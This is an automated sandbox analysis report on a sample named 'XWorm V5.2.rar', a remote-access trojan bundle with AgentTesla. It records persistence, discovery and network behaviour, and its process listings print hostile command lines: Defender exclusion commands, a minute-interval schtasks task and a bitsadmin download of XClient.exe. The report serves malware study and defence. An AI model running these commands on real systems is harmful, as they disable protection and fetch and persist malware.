Malware Analysis Report

2024-10-16 05:01

Sample ID 240802-2mn3rayalf
Target XWorm V5.2.rar
SHA256 6bde76de6064f5cb941da866a26b81f18d4a7e3d738d416238fa73c0b01149a7
Tags: xworm execution persistence rat trojan discovery dropper agilenet agenttesla
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Behavioral analyses, each with Detonation Overview, Command Line, Signatures, Processes, Network and Files, in report order: behavioral28, behavioral1, behavioral16, behavioral23, behavioral17, behavioral25, behavioral31, behavioral21, behavioral32, behavioral13, behavioral22, behavioral24, behavioral3, behavioral5, behavioral7, behavioral29, behavioral30, behavioral9, behavioral19, behavioral20, behavioral10, behavioral14, behavioral15, behavioral26, behavioral27, behavioral4, behavioral6, behavioral8, behavioral18, behavioral2, behavioral11, behavioral12

Analysis Overview

Score: 10/10

SHA256

6bde76de6064f5cb941da866a26b81f18d4a7e3d738d416238fa73c0b01149a7

Threat Level: Known bad

The file XWorm V5.2.rar was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan discovery dropper agilenet agenttesla

Xworm family

Xworm

Contains code to disable Windows Defender

AgentTesla payload

Agenttesla family

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Checks computer location settings

Executes dropped EXE

Obfuscated with Agile.Net obfuscator

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-02 22:42

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm family

xworm

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (57 identical rows; no description, indicator, process or target recorded)

Analysis: behavioral28

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:39

Platform

win10v2004-20240802-en

Max time kernel

422s

Max time network

425s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:27

Platform

win7-20240708-en

Max time kernel

357s

Max time network

362s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:35

Platform

win10v2004-20240802-en

Max time kernel

599s

Max time network

419s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 540 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 540 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 1624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 812 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 812 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe
PID 1624 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

"C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"

C:\Users\Public\q11111

C:\Users\Public\q11111

(the path/command-line pair above is repeated for 10 process instances)

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp (5 connections)
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp (4 connections)
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp (64 connections)

Files

memory/540-0-0x00007FFD52CB3000-0x00007FFD52CB5000-memory.dmp

memory/540-1-0x0000000000780000-0x0000000001D02000-memory.dmp

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 767d4d113ea2e9d9886b2aa1710db7f3
SHA1 f7f779a94fb6fe0e3ee8996dff7951b3b5c7b1b0
SHA256 b06506ca596951ae4c75e43d5aba7c255c557cf5607915a214c2a3f53e97934f
SHA512 ea1f6b926b2e19d0521dc3939c247094640ba6fb10b8c0a4dbb48306c5b7e8b9a3659d4f83ead234ba3c035ae09d891d8c2c302945f48b94a4a0916d3ca7ee41

memory/1624-14-0x0000000000010000-0x0000000000060000-memory.dmp

memory/1624-16-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp

memory/1624-54-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp

memory/4484-60-0x00000197143C0000-0x00000197143E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1soeebal.sdx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0cef0ab8fb4f5e4162ce67e844c3aa54
SHA1 4deb083986e41017371af415c8a0829da4a9f626
SHA256 b0aa3ab509f749d4ec08cd6ec38a707d1b3c18f1386e5bcf017119cda834adbe
SHA512 0f562119e6229d1bcaa3e34253685dc255cbb419515218876c1868e70f9f95d9f158a2658272e3f4bd9d7276aee79d5d2ae05ce8bfb453aa4b6af6ae84a90541

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 98baf5117c4fcec1692067d200c58ab3
SHA1 5b33a57b72141e7508b615e17fb621612cb8e390
SHA256 30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
SHA512 344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

memory/1624-102-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp

memory/1624-103-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\q11111.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Analysis: behavioral23

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win7-20240708-en

Max time kernel

361s

Max time network

365s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:36

Platform

win7-20240729-en

Max time kernel

596s

Max time network

361s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2572 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 2572 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 2572 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 1800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 1800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 1800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 1800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 2408 wrote to memory of 3032 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2408 wrote to memory of 3032 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2408 wrote to memory of 3032 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2408 wrote to memory of 3032 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2408 wrote to memory of 2812 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2408 wrote to memory of 2812 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2408 wrote to memory of 2812 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2408 wrote to memory of 2812 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2812 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2812 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2812 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 112 wrote to memory of 1616 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1616 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1616 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 3032 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 3032 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 3032 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1320 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1320 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1320 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2840 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2840 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2840 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2128 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2128 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2128 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1052 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1052 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 1052 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2068 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2068 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2068 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2236 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2236 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 112 wrote to memory of 2236 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

C:\Users\Admin\AppData\Roaming\Output.exe

"C:\Users\Admin\AppData\Roaming\Output.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {328C09D4-728B-4380-B0EA-3FA004774498} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe
